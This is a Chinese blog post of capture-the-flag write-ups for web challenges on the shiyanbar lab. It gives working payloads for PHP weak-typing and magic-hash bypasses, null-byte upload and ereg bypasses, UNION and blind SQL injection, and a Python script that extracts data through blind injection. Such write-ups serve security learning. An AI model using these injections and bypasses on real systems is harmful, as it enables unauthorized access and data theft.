<!DOCTYPE html>












  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222"/>
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2"/>

<link rel="stylesheet" href="/css/main.css?v=7.1.0"/>


  <link rel="apple-touch-icon" sizes="180x180" href="https://github.com/Windylh/image/raw/master/icon.ico?v=7.1.0">


  <link rel="icon" type="image/png" sizes="32x32" href="https://github.com/Windylh/image/raw/master/icon.ico?v=7.1.0">


  <link rel="icon" type="image/png" sizes="16x16" href="https://github.com/Windylh/image/raw/master/icon.ico?v=7.1.0">


  <link rel="mask-icon" href="https://github.com/Windylh/image/raw/master/icon.ico?v=7.1.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '7.1.0',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="PHP大法题目：http://www.shiyanbar.com/ctf/54
提示访问index.php.txt
1234567891011121314151617&amp;lt;?phpif(eregi(&quot;hackerDJ&quot;,$_GET[id])) &amp;#123;  echo(&quot;&amp;lt;p&amp;gt;not allowed!&amp;lt;/p&amp;gt;&quot;);  exit();&amp;#125;$_GET[id] = ur">
<meta property="og:type" content="article">
<meta property="og:title" content="实验吧(Web部分)Writeup">
<meta property="og:url" content="http://yoursite.com/2017/09/15/实验吧(Web部分)Writeup/index.html">
<meta property="og:site_name" content="Windylh's blog">
<meta property="og:description" content="PHP大法题目：http://www.shiyanbar.com/ctf/54
提示访问index.php.txt
1234567891011121314151617&amp;lt;?phpif(eregi(&quot;hackerDJ&quot;,$_GET[id])) &amp;#123;  echo(&quot;&amp;lt;p&amp;gt;not allowed!&amp;lt;/p&amp;gt;&quot;);  exit();&amp;#125;$_GET[id] = ur">
<meta property="og:image" content="http://ctf5.shiyanbar.com/web/web200.jpg">
<meta property="og:image" content="https://github.com/Windylh/image/raw/master/2017.7.25/upload1.png">
<meta property="og:image" content="https://github.com/Windylh/image/raw/master/2017.7.25/upload1.png">
<meta property="og:image" content="https://github.com/Windylh/image/raw/master/2017.7.25/hash1.png">
<meta property="og:image" content="https://github.com/Windylh/image/raw/master/2017.7.25/hash2.png">
<meta property="og:updated_time" content="2018-11-01T10:52:57.138Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="实验吧(Web部分)Writeup">
<meta name="twitter:description" content="PHP大法题目：http://www.shiyanbar.com/ctf/54
提示访问index.php.txt
1234567891011121314151617&amp;lt;?phpif(eregi(&quot;hackerDJ&quot;,$_GET[id])) &amp;#123;  echo(&quot;&amp;lt;p&amp;gt;not allowed!&amp;lt;/p&amp;gt;&quot;);  exit();&amp;#125;$_GET[id] = ur">
<meta name="twitter:image" content="http://ctf5.shiyanbar.com/web/web200.jpg">





  
  
  <link rel="canonical" href="http://yoursite.com/2017/09/15/实验吧(Web部分)Writeup/"/>



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>实验吧(Web部分)Writeup | Windylh's blog</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Windylh's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Navigationsleiste an/ausschalten">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br/>Startseite</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br/>Schlagwörter</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br/>Archiv</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2017/09/15/实验吧(Web部分)Writeup/"/>

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Windylh"/>
      <meta itemprop="description" content=""/>
      <meta itemprop="image" content="https://raw.githubusercontent.com/Windylh/image/master/logo.jpg"/>
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Windylh's blog"/>
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">实验吧(Web部分)Writeup

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Veröffentlicht am</span>
              

              
                
              

              <time title="Erstellt: 2017-09-15 00:00:00" itemprop="dateCreated datePublished" datetime="2017-09-15T00:00:00+08:00">2017-09-15</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Bearbeitet am</span>
                
                <time title="Geändert am: 2018-11-01 18:52:57" itemprop="dateModified" datetime="2018-11-01T18:52:57+08:00">2018-11-01</time>
              
            
          </span>

          

          
            
            
          

          
          
            <span id="/2017/09/15/实验吧(Web部分)Writeup/" class="leancloud_visitors" data-flag-title="实验吧(Web部分)Writeup">
              <span class="post-meta-divider">|</span>
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              
                <span class="post-meta-item-text">Aufrufe: </span>
              
                <span class="leancloud-visitors-count"></span>
            </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="PHP大法"><a href="#PHP大法" class="headerlink" title="PHP大法"></a>PHP大法</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/54" target="_blank" rel="external">http://www.shiyanbar.com/ctf/54</a></p>
<p>提示访问index.php.txt</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="keyword">if</span>(eregi(<span class="string">"hackerDJ"</span>,$_GET[id])) &#123;</div><div class="line">  <span class="keyword">echo</span>(<span class="string">"&lt;p&gt;not allowed!&lt;/p&gt;"</span>);</div><div class="line">  <span class="keyword">exit</span>();</div><div class="line">&#125;</div><div class="line"></div><div class="line">$_GET[id] = urldecode($_GET[id]);</div><div class="line"><span class="keyword">if</span>($_GET[id] == <span class="string">"hackerDJ"</span>)</div><div class="line">&#123;</div><div class="line">  <span class="keyword">echo</span> <span class="string">"&lt;p&gt;Access granted!&lt;/p&gt;"</span>;</div><div class="line">  <span class="keyword">echo</span> <span class="string">"&lt;p&gt;flag: *****************&#125; &lt;/p&gt;"</span>;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div><div class="line"></div><div class="line"></div><div class="line">&lt;br&gt;&lt;br&gt;</div><div class="line">Can you authenticate to this website?</div></pre></td></tr></table></figure>
<a id="more"></a>
<p>和XMAN的urlencode差不多的思路，不过XMAN的题目并没有给源码。</p>
<p>url编码会自动解码一次，所以需要将id变量的值进行两次urlencode。</p>
<p>payload：<code>?id=%25%36%38%25%36%31%25%36%33%25%36%62%25%36%35%25%37%32%25%34%34%25%34%61</code></p>
<p>flag:<code>DUTCTF{PHP_is_the_best_program_language}</code></p>
<h3 id="NSCTF-web200"><a href="#NSCTF-web200" class="headerlink" title="NSCTF web200"></a>NSCTF web200</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/1760" target="_blank" rel="external">http://www.shiyanbar.com/ctf/1760</a></p>
<p>题目给出图片。<br><img src="http://ctf5.shiyanbar.com/web/web200.jpg" alt="题目"></p>
<p>直接写解密脚本<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> base64</div><div class="line"></div><div class="line">s=<span class="string">'a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws'</span></div><div class="line">flag=<span class="string">''</span></div><div class="line"></div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> s:</div><div class="line">    <span class="keyword">if</span>((ord(i)&gt;=ord(<span class="string">'A'</span>) <span class="keyword">and</span> ord(i)&lt;=ord(<span class="string">'Z'</span>)) <span class="keyword">or</span> (ord(i)&gt;=ord(<span class="string">'a'</span>) <span class="keyword">and</span> ord(i)&lt;=ord(<span class="string">'z'</span>))):</div><div class="line">        <span class="keyword">if</span>(ord(i)<span class="number">-13</span>&lt;ord(<span class="string">'A'</span>) <span class="keyword">and</span> ord(i)&gt;=ord(<span class="string">'A'</span>) <span class="keyword">and</span> ord(i)&lt;=ord(<span class="string">'Z'</span>)):</div><div class="line">            flag+=chr(ord(i)+<span class="number">13</span>)</div><div class="line">        <span class="keyword">elif</span>(ord(i)<span class="number">-13</span>&lt;ord(<span class="string">'a'</span>) <span class="keyword">and</span> ord(i)&gt;=ord(<span class="string">'a'</span>) <span class="keyword">and</span> ord(i)&lt;=ord(<span class="string">'z'</span>)):</div><div class="line">            flag+=chr(ord(i)+<span class="number">13</span>)</div><div class="line">        <span class="keyword">else</span>:</div><div class="line">            flag+=chr(ord(i)<span class="number">-13</span>)</div><div class="line">    <span class="keyword">else</span>:</div><div class="line">        flag+=i;</div><div class="line"></div><div class="line">flag=flag[::<span class="number">-1</span>]</div><div class="line"></div><div class="line">s=<span class="string">''</span></div><div class="line">flag=base64.b64decode(flag)</div><div class="line"></div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(flag)):</div><div class="line">    s+=chr(ord(flag[i])<span class="number">-1</span>)</div><div class="line">s=s[::<span class="number">-1</span>]</div><div class="line"><span class="keyword">print</span> s</div></pre></td></tr></table></figure></p>
<p>flag:<code>flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}</code></p>
<h3 id="忘记密码了"><a href="#忘记密码了" class="headerlink" title="忘记密码了"></a>忘记密码了</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/1808" target="_blank" rel="external">http://www.shiyanbar.com/ctf/1808</a></p>
<p>进入网站step1.php，查看源代码，发现一句<code>&lt;meta name=&quot;editor&quot; content=&quot;Vim&quot; /&gt;</code></p>
<p>vim编辑，可能存在<code>.xxxx.php.swp</code>的备份文件。尝试了<code>.step1.php.swp</code>、<code>.step2.php.swp</code>，都是404，查看step2.php的源码，发现有一个Submit.php，直接访问，提示<code>you are not an admin</code>，访问<code>.submit.php.swp</code>，果然存在，源码如下<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>($token)&amp;&amp;!<span class="keyword">empty</span>($emailAddress))&#123;</div><div class="line">    <span class="keyword">if</span>(strlen($token)!=<span class="number">10</span>) <span class="keyword">die</span>(<span class="string">'fail'</span>);</div><div class="line">    <span class="keyword">if</span>($token!=<span class="string">'0'</span>) <span class="keyword">die</span>(<span class="string">'fail'</span>);</div><div class="line">    $sql = <span class="string">"SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'"</span>;</div><div class="line">    $r = mysql_query($sql) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">'db error'</span>);</div><div class="line">    $r = mysql_fetch_assoc($r);</div><div class="line">    $r = $r[<span class="string">'num'</span>];</div><div class="line">    <span class="keyword">if</span>($r&gt;<span class="number">0</span>)&#123;</div><div class="line">        <span class="keyword">echo</span> $flag;</div><div class="line">    &#125;<span class="keyword">else</span>&#123;</div><div class="line">        <span class="keyword">echo</span> <span class="string">"you are not an admin"</span>;</div><div class="line">    &#125;</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>邮箱为admin的邮箱，要求token长度为10，且token需要等于零。</p>
<p>邮箱在step1.php中有提到<code>&lt;meta name=&quot;admin&quot; content=&quot;admin@simplexue.com&quot; /&gt;</code></p>
<p>token验证可以用php中的<code>0exxxxxxxx</code>绕过。</p>
<p>payload：<code>?emailAddress=admin@simplexue.com&amp;token=0e11111111</code></p>
<p>flag：<code>SimCTF{huachuan_TdsWX}</code></p>
<h3 id="这个看起来有点简单"><a href="#这个看起来有点简单" class="headerlink" title="这个看起来有点简单!"></a>这个看起来有点简单!</h3><p>题目:<a href="http://www.shiyanbar.com/ctf/33" target="_blank" rel="external">http://www.shiyanbar.com/ctf/33</a></p>
<p>访问题目地址，给出了一个带<code>?id=1</code>的地址，和一个表格，猜测sql注入。</p>
<p>用常用的<code>&#39;</code>,<code>and 1=1</code>,<code>and 1=2</code>,判断存在sql注入。</p>
<p>表格有两列，所以判断数据库中也是两列。</p>
<p>查询数据库名<code>?id=1 union select 1,concat(database()) --</code>，得到库名<code>my_db</code>。</p>
<p>查询数据库表名<code>?id=1 union select 1,concat(table_name) from information_schema.tables where table_schema=database() --</code>，得到两个表名，<code>news</code>,<code>thiskey</code></p>
<p>查询thiskey表的字段名<code>?id=1 union select 1,concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#39;thiskey&#39;  --</code>，查到字段<code>k0y</code></p>
<p>爆出字段k0y<code>?id=1 union select 1,concat(k0y) from thiskey  --</code>,得到flag。</p>
<p>flag：<code>whatiMyD91dump</code></p>
<h3 id="上传绕过"><a href="#上传绕过" class="headerlink" title="上传绕过"></a>上传绕过</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/1781" target="_blank" rel="external">http://www.shiyanbar.com/ctf/1781</a></p>
<p>题目要求上传一个jpg,gif,png格式的文件，但是上传之后有要求是php格式。</p>
<p>上传绕过，在filename后加<code>%00.jpg</code>，在Hex视图下修改目录后空格的<code>20</code>为<code>00</code>，即可绕过。</p>
<p><img src="https://github.com/Windylh/image/raw/master/2017.7.25/upload1.png" alt="1"><br><img src="https://github.com/Windylh/image/raw/master/2017.7.25/upload1.png" alt="2"></p>
<p>flag:<code>flag{SimCTF_huachuan}</code></p>
<h3 id="天网管理系统"><a href="#天网管理系统" class="headerlink" title="天网管理系统"></a>天网管理系统</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/1810" target="_blank" rel="external">http://www.shiyanbar.com/ctf/1810</a></p>
<p>查看源代码，有注释。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;!-- $test=$_GET[&apos;username&apos;]; $test=md5($test); if($test==&apos;0&apos;) --&gt;</div></pre></td></tr></table></figure></p>
<p>让username的MD5和0相等，可以让MD5以<code>0e</code>开头。</p>
<p><a href="http://www.cnblogs.com/Primzahl/p/6018158.html" target="_blank" rel="external">0e开头的MD5总结</a></p>
<p>username输入<code>QNKCDZO</code>，得到<code>/user.php?fame=hjkleffifer</code>，访问页面看到一段php源码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">$unserialize_str = $_POST[<span class="string">'password'</span>]; </div><div class="line">$data_unserialize = unserialize($unserialize_str); </div><div class="line"><span class="keyword">if</span>($data_unserialize[<span class="string">'user'</span>] == <span class="string">'???'</span> &amp;&amp; $data_unserialize[<span class="string">'pass'</span>]==<span class="string">'???'</span>) </div><div class="line">&#123;  </div><div class="line">  print_r($flag); </div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>这段php将post的password值进行了反序列化，得到了一个数组，将数组的user和pass的值和???进行了比较。比较用到了php的弱类型，<strong>bool类型的true跟任意字符串可以弱类型相等*</strong>。</p>
<p>payload:<code>post：a:2:{s:4:&quot;user&quot;;b:1;s:4:&quot;pass&quot;;b:1;}</code></p>
<p>flag:<code>ctf{dwduwkhduw5465}</code></p>
<h3 id="Once-More"><a href="#Once-More" class="headerlink" title="Once More"></a>Once More</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/1805" target="_blank" rel="external">http://www.shiyanbar.com/ctf/1805</a></p>
<p>php审计题，源码如下。<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="keyword">if</span> (<span class="keyword">isset</span> ($_GET[<span class="string">'password'</span>])) &#123;</div><div class="line">  <span class="keyword">if</span> (ereg (<span class="string">"^[a-zA-Z0-9]+$"</span>, $_GET[<span class="string">'password'</span>]) === <span class="keyword">FALSE</span>)</div><div class="line">  &#123;</div><div class="line">    <span class="keyword">echo</span> <span class="string">'&lt;p&gt;You password must be alphanumeric&lt;/p&gt;'</span>;</div><div class="line">  &#125;</div><div class="line">  <span class="keyword">else</span> <span class="keyword">if</span> (strlen($_GET[<span class="string">'password'</span>]) &lt; <span class="number">8</span> &amp;&amp; $_GET[<span class="string">'password'</span>] &gt; <span class="number">9999999</span>)</div><div class="line">  &#123;</div><div class="line">    <span class="keyword">if</span> (strpos ($_GET[<span class="string">'password'</span>], <span class="string">'*-*'</span>) !== <span class="keyword">FALSE</span>)</div><div class="line">    &#123;</div><div class="line">      <span class="keyword">die</span>(<span class="string">'Flag: '</span> . $flag);</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">else</span></div><div class="line">    &#123;</div><div class="line">      <span class="keyword">echo</span>(<span class="string">'&lt;p&gt;*-* have not been found&lt;/p&gt;'</span>);</div><div class="line">    &#125;</div><div class="line">  &#125;</div><div class="line">  <span class="keyword">else</span></div><div class="line">  &#123;</div><div class="line">    <span class="keyword">echo</span> <span class="string">'&lt;p&gt;Invalid password&lt;/p&gt;'</span>;</div><div class="line">  &#125;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure></p>
<p><code>ereg()</code>函数用<code>%00</code>来截断，password变量的长度要小于8，且大于9999999，用科学记数法，即9e9=9<em>10^9，最后加上`</em>-*`即可</p>
<p>payload:<code>?password=9e9%00*-*</code></p>
<p>flag:<code>CTF{Ch3ck_anD_Ch3ck}</code></p>
<h3 id="简单的sql注入"><a href="#简单的sql注入" class="headerlink" title="简单的sql注入"></a>简单的sql注入</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/1875" target="_blank" rel="external">http://www.shiyanbar.com/ct f/1875</a></p>
<p>题目给出了常见的<code>?id=1</code>参数，下面有id的返回值和name的返回值，我们可以通过id的输出来判断到底过滤了什么。</p>
<p>输入<code>union select</code>的时候，union消失了。再加空格之后select也消失了。猜测是过滤了空格，将两个空格中间的字符一起删除。</p>
<p>空格可以使用<code>/**/、()</code>过滤，构造<code>?id=1/**/union/**/select/**/flag/**/from/**/flag/**/where/**/&#39;1&#39;=&#39;1</code>，ID部分正常回显，说明可以绕过，单引号闭合就是payload。</p>
<p>payload：<code>?id=1&#39;/**/union/**/select/**/flag/**/from/**/flag/**/where/**/&#39;1&#39;=&#39;1</code></p>
<p>flag：<code>flag{Y0u_@r3_5O_dAmn_90Od}</code></p>
<h3 id="天下武功唯快不破"><a href="#天下武功唯快不破" class="headerlink" title="天下武功唯快不破"></a>天下武功唯快不破</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/1854" target="_blank" rel="external">http://www.shiyanbar.com/ctf/1854</a></p>
<p>打开网页，查看源代码，获得提示<code>&lt;!-- please post what you find with parameter:key --&gt;</code>，让我们post参数key。</p>
<p>抓包发现header头中有经过base64编码的flag参数，将参数解码<code>P0ST_THIS_T0_CH4NGE_FL4G:9x3PyMMd9</code>，将参数<code>9x3PyMMd9</code>post却没有结果，题目中说尽快的提交，猜测与时间有关，用python脚本解决。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># -*- coding:utf-8 -*-</span></div><div class="line"></div><div class="line"><span class="keyword">import</span> requests</div><div class="line"><span class="keyword">import</span> base64</div><div class="line"></div><div class="line">url=<span class="string">'http://ctf5.shiyanbar.com/web/10/10.php'</span></div><div class="line">response=requests.get(url)</div><div class="line">head=response.headers</div><div class="line">flag=base64.b64decode(head[<span class="string">'flag'</span>]).split(<span class="string">':'</span>)[<span class="number">1</span>]</div><div class="line"><span class="keyword">print</span> flag</div><div class="line"></div><div class="line">post=&#123;<span class="string">"key"</span>:flag&#125;</div><div class="line">result=requests.post(url=url, data=post) </div><div class="line"></div><div class="line"><span class="keyword">print</span> result.text</div></pre></td></tr></table></figure>
<p>flag：<code>CTF{Y0U_4R3_1NCR3D1BL3_F4ST!}</code></p>
<h3 id="Forbidden"><a href="#Forbidden" class="headerlink" title="Forbidden"></a>Forbidden</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/21" target="_blank" rel="external">http://www.shiyanbar.com/ctf/21</a></p>
<p>页面提示<code>Make sure you are in HongKong</code>。</p>
<p>直接用burpsuit抓包，修改<code>Accept-Language:</code>的值zh-hk，重放即可得到flag。</p>
<p>flag：<code>123JustUserAGent</code></p>
<h3 id="简单的sql注入之2"><a href="#简单的sql注入之2" class="headerlink" title="简单的sql注入之2"></a>简单的sql注入之2</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/1908" target="_blank" rel="external">http://www.shiyanbar.com/ctf/1908</a></p>
<p>用<code>?id=1 and 1=1</code>测试，返回<code>SQLi detected!</code>，这是过滤了and？又尝试了很多关键字，都返回<code>SQLi detected!</code>，那可能是过滤了空格。</p>
<p>用<code>/**/</code>绕过对空格的过滤，构造测试payload<code>?id=1/**/union/**/select/**/flag/**/from/**/flag/**/where/**/1=1</code>发现正常回显，用单引号闭合就是payload。</p>
<p>payload：<code>?id=1&#39;/**/union/**/select/**/flag/**/from/**/flag/**/where/**/&#39;1&#39;=&#39;1</code></p>
<p>flag：<code>flag{Y0u_@r3_5O_dAmn_90Od}</code></p>
<h3 id="简单的sql注入之3"><a href="#简单的sql注入之3" class="headerlink" title="简单的sql注入之3"></a>简单的sql注入之3</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/1909" target="_blank" rel="external">http://www.shiyanbar.com/ctf/1909</a></p>
<p>与前两题类似，也是get参数id进行查询。</p>
<p>输入?id=1，页面正常输出hello，?id=0页面不输出。</p>
<p>输入?id=’页面直接报SQL语法错误。</p>
<p>输入?id=1 and 1=2页面正常 ?id=1’ and ‘1’=’2 页面无输出。</p>
<p>可以看出这是字符型的sql注入，并且没有过滤<code>and</code>和<code>&#39;</code>，在参数正确的情况下输出Hello，错误的情况下无输出。</p>
<p>可以利用bool型注入，构造payload：<code>?id=1&#39; and ascii(substr((select flag from flag limit 1),1,1))=102 %23</code></p>
<p>可以显示<code>Hello!</code>，将102改成其他数值就没有返回值。</p>
<p>利用python脚本获得flag。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> requests </div><div class="line"><span class="keyword">import</span> time</div><div class="line"></div><div class="line">url = <span class="string">'http://ctf5.shiyanbar.com/web/index_3.php?id='</span> </div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">check</span><span class="params">(payload)</span>:</span></div><div class="line">  url1=url+payload   </div><div class="line">  r = requests.get(url1).content    </div><div class="line">  <span class="comment">#print r</span></div><div class="line">  <span class="keyword">return</span> <span class="string">'Hello'</span> <span class="keyword">in</span> r</div><div class="line">flag=<span class="string">''</span></div><div class="line">s = <span class="string">r'1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@_&#123;&#125;'</span></div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">0</span>,<span class="number">32</span>):    </div><div class="line">  <span class="keyword">for</span> c <span class="keyword">in</span> s:        </div><div class="line">    payload = <span class="string">'1\' and ascii(substr((select flag from flag limit 1),'</span>+str(i)+<span class="string">',1))='</span>+str(ord(c))+<span class="string">' %23'</span>       </div><div class="line">    <span class="comment">#print payload</span></div><div class="line">    <span class="keyword">if</span> check(payload):</div><div class="line">      flag += c            </div><div class="line">      <span class="keyword">break</span></div><div class="line">  <span class="keyword">print</span> flag</div><div class="line">  <span class="keyword">if</span> <span class="string">'&#125;'</span> <span class="keyword">in</span> flag:</div><div class="line">    <span class="keyword">break</span></div></pre></td></tr></table></figure>
<p>flag:<code>flag{Y0u_@r3_5O_dAmn_90Od}</code></p>
<h3 id="Guess-Next-Session"><a href="#Guess-Next-Session" class="headerlink" title="Guess Next Session"></a>Guess Next Session</h3><p>题目:<a href="http://www.shiyanbar.com/ctf/1788" target="_blank" rel="external">http://www.shiyanbar.com/ctf/1788</a></p>
<p>网页上方随机生成的三个随机数，一个输入框，还给出了源码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">session_start(); </div><div class="line"><span class="keyword">if</span> (<span class="keyword">isset</span> ($_GET[<span class="string">'password'</span>])) &#123;</div><div class="line">    <span class="keyword">if</span> ($_GET[<span class="string">'password'</span>] == $_SESSION[<span class="string">'password'</span>])</div><div class="line">        <span class="keyword">die</span> (<span class="string">'Flag: '</span>.$flag);</div><div class="line">    <span class="keyword">else</span></div><div class="line">        <span class="keyword">print</span> <span class="string">'&lt;p&gt;Wrong guess.&lt;/p&gt;'</span>;</div><div class="line">&#125;</div><div class="line"></div><div class="line">mt_srand((microtime() ^ rand(<span class="number">1</span>, <span class="number">10000</span>)) % rand(<span class="number">1</span>, <span class="number">10000</span>) + rand(<span class="number">1</span>, <span class="number">10000</span>));</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
